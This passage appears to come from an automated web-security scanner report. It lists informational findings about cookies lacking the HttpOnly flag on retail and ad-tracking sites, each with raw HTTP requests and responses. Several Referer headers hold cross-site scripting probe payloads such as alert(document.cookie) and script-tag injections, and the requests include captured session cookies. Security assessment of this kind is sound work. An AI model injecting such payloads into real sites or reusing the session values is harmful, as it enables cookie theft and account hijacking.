Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5073846237920387925; LivePersonID=-16101514677756-1305542458:-1:-1:-1:-1; HumanClickSiteContainerID_53965383=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; ASPSESSIONIDSQQDDBBA=PFKNNJDBKAJLDGDMHMKKDBLP; ASPSESSIONIDQQSDBBST=HDNGFJFBPMFLJCBLKCDCDNAI; HumanClickACTIVE=1305542456097

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:42:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1305542521752; expires=Tue, 17-May-2011 10:42:01 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 10:42:01 GMT
Set-Cookie: HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28192

lpConnLib.Process({"ResultSet": {"lpCallId":"462539339205-611415113089","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.132. http://sales.liveperson.net/hc/53965383/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/53965383/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: HumanClickKEY, HumanClickACTIVE. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/53965383/?&site=53965383&cmd=mTagKnockPage&lpCallId=169177485630-465463362168&protV=20&lpjson=1&id=4691856149&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-toshiba-english-laptop%7Cnull%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=764357015027527896; LivePersonID=-16101514677756-1305510079:-1:-1:-1:-1; HumanClickSiteContainerID_53965383=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510890596

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3588534029298802466; path=/hc/53965383
Set-Cookie: HumanClickACTIVE=1305511374488; expires=Tue, 17-May-2011 02:02:54 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:02:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28192

lpConnLib.Process({"ResultSet": {"lpCallId":"169177485630-465463362168","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.133. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seal-alaskaoregonwesternwashington.bbb.org
Path:   /logo/rbhzbus/blue-nile-15026564.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: logolink (set twice, once for alaskaoregonwesternwashington.bbb.org and once for bbb.org). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logo/rbhzbus/blue-nile-15026564.png HTTP/1.1
Host: seal-alaskaoregonwesternwashington.bbb.org
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:47 GMT
Server: Apache
Set-Cookie: logolink=15026564; path=/; domain=alaskaoregonwesternwashington.bbb.org
Set-Cookie: logolink=15026564; path=/; domain=bbb.org
Content-Disposition: inline; filename="seal-for-15026564.png"
Expires: Mon, 16 May 2011 06:28:51 GMT
Last-Modified: Sun, 15 May 2011 18:28:51 GMT
Etag: b69d8f80e55ef7e800faaca310c64b63
Content-Type: image/png
Content-Length: 8248

.PNG
.
...IHDR.......&........l....IDATx...y|......yf.d.I .CX." .,."...e...Z....m....R.....m..R.@.
(.. ..o            YI&....s.?..Ib@H..V~......9..3s...9...D...h..{...........!..#T.m&...(?.....6...X.!...o..
...[SNIP]...

13.134. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=30364&partnerID=64&clientID=4391&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: segments_p1="eJzjYuFo2czIxczxL5yLi2PPPmaBf5vPvWMBAEeMB9M="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:42:26 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM=";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 10:42:26 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1057210&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


13.135. http://server.bhphotovideo.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.bhphotovideo.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?ci=90132819&st=1305510783215&vn1=4.2.15-AdTarget&ec=utf-8&pi=RootPage.jsp&ul=http%3A//www.bhphotovideo.com&tid=10&ti=1305541013259&fo=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1%3AU&fi=0%3A0%3A%3B HTTP/1.1
Host: server.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; CoreID6=70091305509949141053400; TestSess3=70091305509949141053400; 90132819_login=1305509951001684455490132819; 90132819_reset=1305510790; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:53 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90132819_login=1305541013018461671490132819; path=/
Set-Cookie: 90132819_reset=1305541013;path=/
Expires: Sun, 15 May 2011 16:16:53 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.136. http://srv.clickfuse.com/pixels/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /pixels/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixels/create.php?name=criteo&expire=30 HTTP/1.1
Host: srv.clickfuse.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712968%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2710&c=2&cb=40851379534
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Mon, 16 May 2011 02:02:58 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="/w3c/p3p.xml"
Server: Apache
Set-Cookie: criteo=tagged; expires=Wed, 15-Jun-2011 02:02:58 GMT; path=/; domain=.clickfuse.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,...........D..

13.137. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv2.wa.marketingsolutions.yahoo.com
Path:   /script/ScriptServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/ScriptServlet?aid=1K17SBM0N76O75C93SIIUNQINTO HTTP/1.1
Host: srv2.wa.marketingsolutions.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: B=ek8k2sl67ofpa&b=3&s=sm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:20 GMT
P3P: policyref = "http://p3p.yahoo.com/w3c/p3p2.xml", CP = "NOI DSP COR CURa ADMo DEVa PSAa PSDa OUR BUS IND UNI PUR COM NAV INT STA"
Set-Cookie: SYSTEM_USER_ID=FLRTMBVOCL8UVKO69ABBTHN724; Domain=.wa.marketingsolutions.yahoo.com; Expires=Fri, 15-May-2015 10:41:20 GMT; Path=/
Expires: Mon, 16 May 2011 18:41:20 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Cache-Control: private
Content-Length: 8628


function ysm1(){}ysm1.prototype.ysm2=function(s){if(typeof(s)=='string'&&s!=null)return true;else return false;};ysm1.prototype.ysm3=function(o){if(typeof(o)=='object'&&o!=null)return true;else retur
...[SNIP]...

13.138. http://subscriptions.marvel.com/checkout/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /checkout/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/ HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
Referer: http://subscriptions.marvel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:36:20 GMT
Server: Apache
X-server-addr: 192.168.100.222
X-trying: 192.168.100.2
X-mysql: 192.168.100.2
Location: https://subscriptions.marvel.com/checkout/
Set-Cookie: split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; expires=Mon, 16-May-2011 12:36:20 GMT; path=/
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Type: text/html; charset=utf-8
Content-Length: 27160

<html>
<head>
<title>Marvel Subscriptions - Checkout</title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="screen
...[SNIP]...

13.139. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=5&mt_exuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065303452389e-4fca-41aa-bb8c-dae5ee1bcb77 HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510870; mt_mop=1:1305510843|5:1305510870|9:1305510197
If-None-Match: 4dd07bc8-e97b-118c-3dec-7b8c5c306530

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x413f 16703
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:39 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510879; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT
Set-Cookie: mt_mop=5:1305510879|1:1305510843|9:1305510197; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

13.140. http://tags.mediaforge.com/if/50

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /if/50

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /if/50 HTTP/1.1
Host: tags.mediaforge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Mon, 16 May 2011 10:50:15 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.8.53
Set-Cookie: uID=Cqo6g03RAWdt2gOeC3Z5Ag==; expires=Tue, 15-May-12 10:50:15 GMT; domain=.mediaforge.com; path=/
Content-Length: 1443
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

13.141. http://trvlgrd.netmng.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trvlgrd.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=088&u3=tgdirect&u4=000329&u8=us_direct&u9=Live; HTTP/1.1
Host: trvlgrd.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_TRAVELGUARD=8esftitq0xjod%7CsxLTMe9Cr3h0%2FM5E807%2Be%2FxaKSnX5sL6Ex9uB%2BcxkmmjhZhpXMGT2%2B6sv5T%2FSe2rLY6ooL%2F9ms3VJvHnlPiIrCo3BbiigP%2FySWpw7KNO1qJ6NVDtND6NhTQIYMUURFDdYIgaWTrA5n7dke1eLHP7Vct76LaBNe1NhLtDq%2BS4Imd0mq7GtsqV4DMAU%2Bi7Q7t%2F72nZ92tGWUu9rRN%2FWa%2B7gg%3D%3D; evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:01 GMT
Server: Apache/2.2.9
P3P: policyref="http://trvlgrd.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 02:01:01 GMT
Last-Modified: Sat, 14 May 2011 02:01:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_TRAVELGUARD=8esftitq0xjod%7CmNZFPeMSBHHrkJOK7jnRMSoysnLE0dmNWb03gtHOALTDPO03KkwNiJKZPHw8SLn%2BnB4GM7SPo%2FBtyvgOARF7dDLcKE9KDQ2PQCiDLFHSz8J%2FsYb90p%2BlZaFHUa5vkxGGYQH5nCtMJjZfyWszWumCyNsnhINbVVoSIcQACgRzEbI5Zn4wbCzShugNKw3Tukjdbq0WZw46L32YBeHc1ofejw%3D%3D; expires=Tue, 15-Nov-2011 02:01:01 GMT; path=/
Content-Length: 205
Connection: close
Content-Type: text/html; charset=UTF-8

var remarketing_script=document.createElement("SCRIPT");remarketing_script.src=document.location.protocol+"//a.netmng.com/?aid=088";document.getElementsByTagName("head")[0].appendChild(remarketing_scr
...[SNIP]...

13.142. http://uat.netmng.com/pixel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /pixel/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/?aid=274&tax=womens HTTP/1.1
Host: uat.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CE%2FGl4lyrJoU%2FfCqk%2F%2Fz3ABsa7pRKVoMGmzuppb39D6k9ABiWgZysNid%2Bm2o8FYwFGcHO8rdfalO3PrS42EDTvOm6aW%2B7sWIlfhsfYQwVaB7u3s3WL6nGzhvc6l7wsnH2nyC2CAdaKFSu5uJTq71eMnw%2BWhRLZVbdu7NvokiU%2Bfkr1%2BNBHoOIzZYbezn0URA%2FIKOZfIt8VMfXvc18H2H2lJXc7OPudGSP0yecnbfmPazNMiP4MWantE0L0xyfVnCJ89N2aKuAKZ0fcVakRCpfeWH4RcT5kxx5vzOcOFGRHTfpLyyiMi5TvmoX0KXseol8QUJb1bQhuYYU44kjCTBcgKL3%2BOQA0HTnmBaltcY0mVz3e0tAVsSL%2Byrj969mChLiovTlnOj%2B0oxM2rx6O8OsemhLzlhyMEJL9ZBULsDSXy9JjjsitTHCZmC4pZqWy3lOS8l%2Fe4iXC5qh3XX05R0mNHhGU8o4WMMQXvPcZQGVEn7MeVSv4JwEYPUtme7CF0%2Ba

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:21 GMT
Server: Apache/2.2.9
P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 01:54:21 GMT
Last-Modified: Sat, 14 May 2011 01:54:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE; expires=Tue, 15-Nov-2011 01:54:21 GMT; path=/; domain=.netmng.com
Content-Length: 36
Connection: close
Content-Type: image/gif

GIF89a.............,...........D..;

13.143. http://web.aisle7.net/jsapi/1.0/content.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.aisle7.net
Path:   /jsapi/1.0/content.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsapi/1.0/content.js HTTP/1.1
Host: web.aisle7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:52:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Last-Modified: Thu, 12 May 2011 04:06:21 GMT
Content-Type: text/javascript
Set-Cookie: aisle7c6=4090937773.1.3050751168.2719681593; path=/
Content-Length: 71512


if (!window['$hnj'] || !$hnj.registry.included('/scripts/libraries/jquery/core.js')) {
(function(){var W=this,ab,F=W.jQuery,S=W.$,T=W.jQuery=W.$=function(b,a){return new T.fn.init(b,a)},M=/^[^<]*(
...[SNIP]...

13.144. http://www.acehardware.com/category/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; 